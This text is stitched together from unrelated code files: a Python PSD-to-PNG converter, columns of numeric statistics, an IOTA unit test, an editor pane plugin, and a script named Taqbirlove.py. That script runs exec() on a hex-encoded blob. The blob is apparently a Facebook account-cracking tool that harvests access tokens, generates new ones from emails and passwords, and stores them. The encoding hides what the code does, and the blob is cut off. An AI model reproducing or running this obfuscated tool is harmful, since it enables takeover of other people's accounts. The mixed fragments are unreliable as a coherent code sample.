for key, todir in opt["unity_delevery_keychar"].items():
for layer_key in layer_comp:
if layer_key == key:
makedirs(todir)
layer_image.save("%s/%s.png"%(todir, layer.name))
# read layers from psd file
for layer in psd.layers:
# stop event
if data["stop_event"].is_set():
break
# handle grouped layers
if type(layer) == Group:
save_layers_to_png(layer, layer.name)
continue
# dive to save logic
save_layer(layer, groupname)
def remove_files_not_in_layers(psd, dirname=None):
""" remove unused files: files from deleted layers, user added files ... """
# confirm dirname (in case, using groups directory)
current_dir = opt["dirname"]
if not dirname == None:
current_dir = dirname
# remove duplicates
data["generated_files"] = list(set(data["generated_files"]))
for dir_file in os.listdir(current_dir):
if ", ".join(opt["ignores"]).find(dir_file) != -1:
continue
flag_found = False # find file name
for genfile in data["generated_files"]:
if dir_file[:-4] == genfile:
flag_found = True
break
if not flag_found:
# delete file
f = current_dir + "/" + dir_file
if os.path.isdir(f):
# f is directory:
remove_files_not_in_layers(psd, f)
else:
# f is file:
try:
os.unlink(f)
except:
# print error
data["app"].output.config(text="[!] Delete Error")
print "[!] delete error"
pass
def create_preview(psd):
psd.as_PIL().save(opt["dirname"] + "/" + opt["preview_file"])
def create_coord(psd):
makedirs(opt["dirname"]) # create directory if not exists
data = {}
for layer in psd.layers:
data[layer.name] = {}
data[layer.name]["name"] = layer.name
data[layer.name]["x"] = layer.bbox.x1
data[layer.name]["y"] = layer.bbox.y1
data[layer.name]["width"] = layer.bbox.width
data[layer.name]["height"] = layer.bbox.height
data[layer.name]["opacity"] = layer.opacity
data[layer.name]["visible"] = layer.visible
# save as json format
jsondata = json.dumps(data, indent=4, sort_keys=True)
result_file = open(opt["dirname"] + "/" + opt["coord_file"], "w+")
result_file.write(jsondata)
result_file.close()
# APPLICATION LAYER
class tkApp:
"""
Application class using Tkinter
usage:
master = Tk()
app = tkApp(master)
master.mainloop()
"""
def __init__(self, master):
"""
initialize application
"""
# app master
self.master = master
# preserve current state
self.is_running = False
self.thread_stop_event = threading.Event()
# main frame
self.frame = Frame(self.master,
width=opt["app_options"]["width"],
height=opt["app_options"]["height"])
self.frame.pack()
# label for text output
self.output = Label(self.frame,
width=opt["app_options"]["width"],
justify=LEFT, anchor=NW,
bg="#DBC", font="Ubuntu")
self.output.pack(side=LEFT, fill="x")
# view label with optioned size
self.view_canvas = Canvas(self.master,
width=opt["app_options"]["preview_image_width"],
height=opt["app_options"]["preview_image_height"])
self.view_canvas.pack(fill="both")
logo_image = Image.open(cStringIO.StringIO(base64.b64decode(opt["logo_image_source"])))
self.preview_image = ImageTk.PhotoImage(logo_image)
self.view_canvas.create_image((logo_image.size[0]/2,
logo_image.size[1]/2),
image=self.preview_image)
# frame contains buttons
buttons_frame = Frame(self.master)
buttons_frame.pack(side=BOTTOM, fill="x")
# toggle: run button <-> stop button
self.button_run = Button(buttons_frame,
text="Run", command=self.run_manager)
self.button_run.pack(side=TOP, fill="x")
# quit tkApp
self.button_quit = Button(buttons_frame,
text="Quit", command=self.quit)
self.button_quit.pack(side=TOP, fill="x")
# title
self.master.bind("<Return>", self.run_manager)
self.master.bind("<Escape>", self.quit)
def run_manager(self, event=None):
if self.is_running:
# prevent multiple thread
return
# set button
self.button_run["text"] = "Stop"
self.button_run["command"] = self.stop_manager # set command
self.master.bind("<Return>", self.stop_manager) # bind return key
# set switches
self.is_running = True
self.thread_stop_event.clear()
# create thread
self.new_thread()
def stop_manager(self, event=None):
# set button
self.button_run["text"] = "Run"
self.button_run["command"] = self.run_manager # set command
self.master.bind("<Return>", self.run_manager) # bind return key
# show logo image
logo_image = Image.open(cStringIO.StringIO(base64.b64decode(opt["logo_image_source"])))
self.preview_image = ImageTk.PhotoImage(logo_image)
self.view_canvas.create_image((logo_image.size[0]/2,
logo_image.size[1]/2),
image=self.preview_image)
# set switches
self.is_running = False
self.thread_stop_event.set()
def new_thread(self):
self.thread = threading.Thread(target=psd2png, args=[self, self.thread_stop_event])
self.thread.start()
print("[-] Running thread: ", self.thread.getName())
def quit(self, event=None):
# terminate thread
self.thread_stop_event.set()
# terminate application
self.master.quit()
# if this code is starting point,
if __name__ == "__main__":
"""
application starts here
"""
# master
master = Tk()
master.wm_title("PSD-2-PNG")
# fix window size
master.minsize(opt["app_options"]["width"], opt["app_options"]["height"])
master.maxsize(opt["app_options"]["width"], opt["app_options"]["height"])
app = tkApp(master)
master.mainloop()
| 392.795652
| 89,589
| 0.944185
| 7,413
| 180,686
| 22.982733
| 0.649535
| 0.036062
| 0.039443
| 0.033809
| 0.233244
| 0.220495
| 0.210294
| 0.205458
| 0.19508
| 0.185184
| 0
| 0.156633
| 0.010228
| 180,686
| 459
| 89,590
| 393.651416
| 0.796022
| 0.008495
| 0
| 0.178862
| 0
| 0.012195
| 0.961579
| 0.951782
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0.00813
| 0.020325
| null | null | 0.02439
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
670742b437eeb0ea3efda9da405c52d7c8ade644
| 7,831
|
py
|
Python
|
test/commands/extended/find_transaction_objects_test.py
|
EasonC13/iota.py
|
f596c1ac0d9bcbceda1cf6109cd921943a6599b3
|
[
"MIT"
] | 347
|
2016-12-23T14:28:06.000Z
|
2019-09-30T13:46:30.000Z
|
test/commands/extended/find_transaction_objects_test.py
|
EasonC13/iota.py
|
f596c1ac0d9bcbceda1cf6109cd921943a6599b3
|
[
"MIT"
] | 194
|
2016-12-22T21:22:47.000Z
|
2019-10-01T09:01:16.000Z
|
test/commands/extended/find_transaction_objects_test.py
|
EasonC13/iota.py
|
f596c1ac0d9bcbceda1cf6109cd921943a6599b3
|
[
"MIT"
] | 147
|
2017-01-08T13:14:47.000Z
|
2019-10-01T22:27:31.000Z
|
from unittest import TestCase
from iota import Iota, AsyncIota, MockAdapter, Transaction
from iota.commands.extended import FindTransactionObjectsCommand
from iota.adapter import async_return
from test import patch, MagicMock, mock, async_test
class FindTransactionObjectsCommandTestCase(TestCase):
def setUp(self):
super(FindTransactionObjectsCommandTestCase, self).setUp()
self.adapter = MockAdapter()
self.command = FindTransactionObjectsCommand(self.adapter)
# Define values that we can reuse across tests.
self.address = 'A' * 81
self.transaction_hash = \
b'BROTOVRCAEMFLRWGPVWDPDTBRAMLHVCHQDEHXLCWH' \
b'KKXLVDFCPIJEUZTPPFMPQQ9KOHAEUAMMVJN99999'
self.trytes = \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999999999999999999999999999999999999999999999999' \
b'99999999999999999AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' \
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA99999999999999999999999999' \
b'9QC9999999999999999999999999PQYJHAD99999999999999999999WHIUDFV' \
b'IFXNBJVEHYPLDADIDINGAWMHYIJNPYUDWXCAWL9GSKTUIZLJGGFIXEIYTJEDQZ' \
b'TIYRXHC9PBWBDSOTEJTQTYYSZLVTFLDQMZSGLHKLYVJOLMXIJJRTGS9RYBXLAT' \
b'ZJXBVBCPUGWRUKZJYLBGPKRKWIA9999FPYHMFFWMMKOHTSAPMMATZQLWXJSPMT' \
b'JSRQIPMDCQXFFMXMHCYDKVJCFSRECAVALCOFIYCJLNRZZZ9999999999999999' \
b'999999999999999KITCXNZOF999999999MMMMMMMMMEA9999F9999999999999' \
b'9999999'
def test_wireup(self):
"""
Verify that the command is wired up correctly. (sync)
The API method indeed calls the appropiate command.
"""
with patch('iota.commands.extended.find_transaction_objects.FindTransactionObjectsCommand.__call__',
MagicMock(return_value=async_return('You found me!'))
) as mocked_command:
api = Iota(self.adapter)
# Don't need to call with proper args here.
response = api.find_transaction_objects('bundle')
self.assertTrue(mocked_command.called)
self.assertEqual(
response,
'You found me!'
)
def test_wireup(self):
"""
Verify that the command is wired up correctly. (sync)
The API method indeed calls the appropiate command.
"""
with patch('iota.commands.extended.find_transaction_objects.FindTransactionObjectsCommand.__call__',
MagicMock(return_value=async_return('You found me!'))
) as mocked_command:
api = Iota(self.adapter)
# Don't need to call with proper args here.
response = api.find_transaction_objects('bundle')
self.assertTrue(mocked_command.called)
self.assertEqual(
response,
'You found me!'
)
@async_test
async def test_wireup_async(self):
"""
Verify that the command is wired up correctly. (async)
The API method indeed calls the appropiate command.
"""
with patch('iota.commands.extended.find_transaction_objects.FindTransactionObjectsCommand.__call__',
MagicMock(return_value=async_return('You found me!'))
) as mocked_command:
api = AsyncIota(self.adapter)
# Don't need to call with proper args here.
response = await api.find_transaction_objects('bundle')
self.assertTrue(mocked_command.called)
self.assertEqual(
response,
'You found me!'
)
@async_test
async def test_transaction_found(self):
"""
A transaction is found with the inputs. A transaction object is
returned
"""
with mock.patch(
'iota.commands.core.find_transactions.FindTransactionsCommand.'
'_execute',
mock.Mock(return_value=async_return({'hashes': [self.transaction_hash, ]})),
):
with mock.patch(
'iota.commands.core.get_trytes.GetTrytesCommand._execute',
mock.Mock(return_value=async_return({'trytes': [self.trytes, ]})),
):
response = await self.command(addresses=[self.address])
self.assertEqual(len(response['transactions']), 1)
transaction = response['transactions'][0]
self.assertIsInstance(transaction, Transaction)
self.assertEqual(transaction.address, self.address)
@async_test
async def test_no_transactions_fround(self):
"""
No transaction is found with the inputs. An empty list is returned
"""
with mock.patch(
'iota.commands.core.find_transactions.FindTransactionsCommand.'
'_execute',
mock.Mock(return_value=async_return({'hashes': []})),
):
response = await self.command(addresses=[self.address])
self.assertDictEqual(
response,
{
'transactions': [],
},
)
| 45.005747
| 108
| 0.68829
| 514
| 7,831
| 10.361868
| 0.210117
| 0.414007
| 0.420578
| 0.804356
| 0.733196
| 0.729253
| 0.712167
| 0.70522
| 0.687195
| 0.679309
| 0
| 0.396476
| 0.246329
| 7,831
| 173
| 109
| 45.265896
| 0.50593
| 0.049291
| 0
| 0.634146
| 0
| 0
| 0.476299
| 0.451604
| 0
| 0
| 0
| 0
| 0.081301
| 1
| 0.02439
| false
| 0
| 0.04065
| 0
| 0.073171
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
673dcfa9bf37a62ae245a6ffa9c45242dd761b43
| 2,820
|
py
|
Python
|
vyapp/plugins/pane_jumps.py
|
iogf/vy
|
4ba0d379e21744fd79a740e8aeaba3a0a779973c
|
[
"MIT"
] | 927
|
2015-02-22T17:34:21.000Z
|
2018-03-23T07:26:17.000Z
|
vyapp/plugins/pane_jumps.py
|
iogf/vy
|
4ba0d379e21744fd79a740e8aeaba3a0a779973c
|
[
"MIT"
] | 22
|
2015-09-02T19:20:22.000Z
|
2018-02-13T16:41:02.000Z
|
vyapp/plugins/pane_jumps.py
|
iogf/vy
|
4ba0d379e21744fd79a740e8aeaba3a0a779973c
|
[
"MIT"
] | 53
|
2015-09-02T12:26:32.000Z
|
2018-01-18T09:11:30.000Z
|
"""
Overview
========
Commands
========
"""
from vyapp.areavi import AreaVi
from vyapp.app import root
class PaneJumps:
def __init__(self, area):
self.area = area
area.install('splits',
(-1, '<Control-Alt-h>', self.jump_left),
(-1, '<Control-Alt-l>', self.jump_right),
(-1, '<Control-Alt-k>', self.jump_up),
(-1, '<Control-Alt-j>', self.jump_down))
def jump_left(self, event):
wids = self.area.master.master.panes()
wids = [str(item) for item in wids]
count = wids.index(str(self.area.master))
count = count - 1
wid = self.area.nametowidget(wids[count])
wid = [ind for ind in wid.winfo_children()
if isinstance(ind, AreaVi)]
# as there is only one.
wid[0].focus_set()
return 'break'
def jump_right(self, event):
wids = self.area.master.master.panes()
wids = [str(item) for item in wids]
count = wids.index(str(self.area.master))
count = (count + 1) % len(wids)
wid = self.area.nametowidget(wids[count])
wid = [ind for ind in wid.winfo_children()
if isinstance(ind, AreaVi)]
# as there is only one.
wid[0].focus_set()
return 'break'
def jump_down(self, event):
wids = self.area.master.master.panes()
wids = [str(item) for item in wids]
index = wids.index(str(self.area.master))
wids = self.area.master.master.master.panes()
wids = [str(item) for item in wids]
count = wids.index(str(self.area.master.master))
count = (count + 1) % len(wids)
wid = self.area.nametowidget(wids[count])
size = len(wid.panes())
wid = self.area.nametowidget(wid.panes()[
index if index < size else (size - 1)])
wid = [ind for ind in wid.winfo_children()
if isinstance(ind, AreaVi)]
# as there is only one.
wid[0].focus_set()
return 'break'
def jump_up(self, event):
wids = self.area.master.master.panes()
wids = [str(item) for item in wids]
index = wids.index(str(self.area.master))
wids = self.area.master.master.master.panes()
wids = [str(item) for item in wids]
count = wids.index(str(self.area.master.master))
count = count - 1
wid = self.area.nametowidget(wids[count])
size = len(wid.panes())
wid = self.area.nametowidget(wid.panes()[
index if index < size else (size - 1)])
wid = [ind for ind in wid.winfo_children()
if isinstance(ind, AreaVi)]
# as there is only one.
wid[0].focus_set()
return 'break'
install = PaneJumps
| 29.375
| 56
| 0.549291
| 364
| 2,820
| 4.200549
| 0.159341
| 0.104644
| 0.109876
| 0.104644
| 0.83257
| 0.83257
| 0.83257
| 0.83257
| 0.83257
| 0.83257
| 0
| 0.007231
| 0.313475
| 2,820
| 95
| 57
| 29.684211
| 0.782541
| 0.044681
| 0
| 0.761905
| 0
| 0
| 0.032078
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079365
| false
| 0
| 0.031746
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
675f2dc47aa969ef6afc24f3eb179d5211cca72e
| 92,055
|
py
|
Python
|
Taqbirlove.py
|
TeamOfDarkroom/Taqbirlov
|
e0c061a16a997bd689d7de9639ddc947e2b5511c
|
[
"Apache-2.0"
] | 3
|
2020-10-30T13:09:18.000Z
|
2021-05-13T06:15:17.000Z
|
Taqbirlove.py
|
TeamOfDarkroom/Taqbirlov
|
e0c061a16a997bd689d7de9639ddc947e2b5511c
|
[
"Apache-2.0"
] | 1
|
2020-08-25T12:10:57.000Z
|
2020-08-25T12:10:57.000Z
|
Taqbirlove.py
|
TeamOfDarkroom/Taqbirlov
|
e0c061a16a997bd689d7de9639ddc947e2b5511c
|
[
"Apache-2.0"
] | 7
|
2020-08-27T16:31:15.000Z
|
2022-01-29T23:37:21.000Z
|
import base64
exec(base64.b16decode('23212F7573722F62696E2F707974686F6E320A23636F64696E673D7574662D380A235468652043726564697420466F72205468697320436F646520476F657320546F20426C61636B54696765722D4572726F723430340A23496620596F752057616E6E612054616B65204372656469747320466F72205468697320436F64652C20506C65617365204C6F6F6B20596F757273656C6620416761696E2E2E2E0A235265736572766564323032300A0A0A696D706F7274206F732C7379732C74696D652C6461746574696D652C72616E646F6D2C686173686C69622C72652C746872656164696E672C6A736F6E2C75726C6C69622C636F6F6B69656C69622C72657175657374732C6D656368616E697A650A66726F6D206D756C746970726F63657373696E672E706F6F6C20696D706F727420546872656164506F6F6C0A66726F6D2072657175657374732E657863657074696F6E7320696D706F727420436F6E6E656374696F6E4572726F720A66726F6D206D656368616E697A6520696D706F72742042726F777365720A0A0A72656C6F616428737973290A7379732E73657464656661756C74656E636F64696E6728277574663827290A6272203D206D656368616E697A652E42726F7773657228290A62722E7365745F68616E646C655F726F626F74732846616C7365290A62722E7365745F68616E646C655F72656672657368286D656368616E697A652E5F687474702E485454505265667265736850726F636573736F7228292C6D61785F74696D653D31290A62722E61646468656164657273203D205B2827557365722D4167656E74272C20274F706572612F392E38302028416E64726F69643B204F70657261204D696E692F33322E302E323235342F38352E20553B206964292050726573746F2F322E31322E3432332056657273696F6E2F31322E313627295D0A0A0A646566206B656C75617228293A0A097072696E7420225C7831625B313B39316D45786974220A096F732E7379732E6578697428290A0A0A646566206163616B2862293A0A2020202077203D2027616874647A6A63270A2020202064203D2027270A20202020666F72206920696E20783A0A202020202020202064202B3D202721272B775B72616E646F6D2E72616E64696E7428302C6C656E2877292D31295D2B690A2020202072657475726E20636574616B2864290A0A0A64656620636574616B2862293A0A2020202077203D2027616874647A6A63270A20202020666F72206920696E20773A0A20202020202020206A203D20772E696E6465782869290A2020202020202020783D20782E7265706C61636528272125732725692C275C3033335B25733B316D27257374722833312B6A29290A2020202078202B3D20275C3033335B306D270A2020202078203D20782E7265706C61636528272130272C275C3033335B306D27290A202020207379732E7374646F75742E777269746528782B275C6E27290A0A0A646566206A616C616E287A293A0A09666F72206520696E207A202B20275C6E273A0A09097379732E7374646F75742E77726974652865290A09097379732E7374646F75742E666C75736828290A090974696D652E736C65657028302E3035290A64656620746F6B656E7A28293A0A096F732E73797374656D2827636C65617227290A097072696E74206C6F676F0A09746F6B6574203D207261775F696E70757428225C3033335B313B39376D5B2B5D20546F6B656E203A22290A097472793A0A09096F7477203D2072657175657374732E676574282768747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D653F6163636573735F746F6B656E3D272B746F6B6574290A090961203D206A736F6E2E6C6F616473286F74772E74657874290A09096E616D61203D20615B276E616D65275D0A09097A656464203D206F70656E28226C6F67696E2E747874222C20277727290A09097A6564642E777269746528746F6B6574290A09097A6564642E636C6F736528290A09096D656E7528290A09657863657074204B65794572726F723A0A09097072696E7420225C3033335B313B39316D5B215D2057726F6E67220A090965203D207261775F696E70757428225C3033335B313B39316D5B3F5D205C3033335B313B39326D57616E7420746F207069636B20757020746F6B656E3F5C3033335B313B39376D5B792F6E5D3A2022290A090969662065203D3D22223A0A0909096B656C75617228290A0909656C69662065203D3D2279223A0A0909096C6F67696E28290A0909656C73653A0A0909096B656C75617228290A0A646566206765742864617461293A0A097072696E7420275B2A5D2047656E65726174652061636365737320746F6B656E20270A0A097472793A0A09096F732E6D6B6469722827636F6F6B696527290A09657863657074204F534572726F723A0A0909706173730A0A0962203D206F70656E2827636F6F6B69652F746F6B656E2E6C6F67272C277727290A097472793A0A090972203D2072657175657374732E676574282768747470733A2F2F6170692E66616365626F6F6B2E636F6D2F726573747365727665722E706870272C706172616D733D64617461290A090961203D206A736F6E2E6C6F61647328722E74657874290A0A0909622E777269746528615B276163636573735F746F6B656E275D290A0909622E636C6F736528290A09097072696E7420275B2A5D207375636365737366756C6C792067656E65726174652061636365737320746F6B656E270A09097072696E7420275B2A5D20596F75722061636365737320746F6B656E2069732073746F72656420696E20636F6F6B69652F746F6B656E2E6C6F67270A09096D656E7528290A09657863657074204B65794572726F723A0A09097072696E7420275B215D204661696C656420746F2067656E65726174652061636365737320746F6B656E270A09097072696E7420275B215D20436865636B20796F757220636F6E6E656374696F6E202F20656D61696C206F722070617373776F7264270A09096F732E72656D6F76652827636F6F6B69652F746F6B656E2E6C6F6727290A09096D656E7528290A096578636570742072657175657374732E657863657074696F6E732E436F6E6E656374696F6E4572726F723A0A09097072696E7420275B215D204661696C656420746F2067656E65726174652061636365737320746F6B656E270A09097072696E7420275B215D20436F6E6E656374696F6E206572726F7220212121270A09096F732E72656D6F76652827636F6F6B69652F746F6B656E2E6C6F6727290A09096D656E7528290A0A6465662070686F6E6528293A0A09676C6F62616C20746F6B65740A096F732E73797374656D2827636C65617227290A097472793A0A0909746F6B65743D6F70656E28276C6F67696E2E747874272C277227292E7265616428290A0965786365707420494F4572726F723A0A09097072696E74225C7831625B313B39346D546F6B656E20696E76616C6964220A09096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A090974696D652E736C6565702831290A09096C6F67696E28290A096F732E73797374656D2827636C656172272909090A0A234465763A426C61636B54696765722D4572726F723430340A2323232323204C4F474F2023232323230A6C6F676F203D202222220A0A5C3033335B313B39316DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39326DE29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39336DE29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39346DE29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39356DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39366DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39376DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39376DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39366DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39356DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39346DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39336DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39326DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39316DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39316DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39326DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39336DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E296880A5C3033335B313B39346DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29480E29688E29688E29688E29688E29688E29688E29688E29480E29480E29688E29688E29688E29688E29688E296880A5C3033335B313B39356DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39366DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39376DE29480E29480E29480E29480E29480E29688E29688E29688E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39376DE29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29688E29480E29480E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E296880A5C3033335B313B39366DE29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39356DE29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39346DE29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39336DE29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39326DE29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E296880A5C3033335B313B39316DE29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E296880A5C3033335B313B39326DE29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E296880A5C3033335B313B39336DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E29688E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E296880A5C3033335B313B39346DE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29688E29688E29688E29688E29688E29688E2968820200A5C3033335B313B39316DE280A2E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E280A20A5C3033335B313B39316DE29688E29688E29688E29688E29688E29688E295972020202020E29688E29688E29688E29688E29688E29688E29688E29688E29597E29688E29688E2959720E29688E29688E29688E29688E29688E29688E2959720E29688E29688E29688E29688E29688E29688E29688E29597E29688E29688E29688E29688E29688E29688E29597200A5C3033335B313B39326DE29688E29688E29594E29590E29590E29688E29688E2959720202020E2959AE29590E29590E29688E29688E29594E29590E29590E2959DE29688E29688E29591E29688E29688E29594E29590E29590E29590E29590E2959D20E29688E29688E29594E29590E29590E29590E29590E2959DE29688E29688E29594E29590E29590E29688E29688E295970A5C3033335B313B39336DE29688E29688E29688E29688E29688E29688E29594E2959D20202020202020E29688E29688E29591202020E29688E29688E29591E29688E29688E295912020E29688E29688E29688E29597E29688E29688E29688E29688E29688E295972020E29688E29688E29688E29688E29688E29688E29594E2959D0A5C3033335B313B39346DE29688E29688E29594E29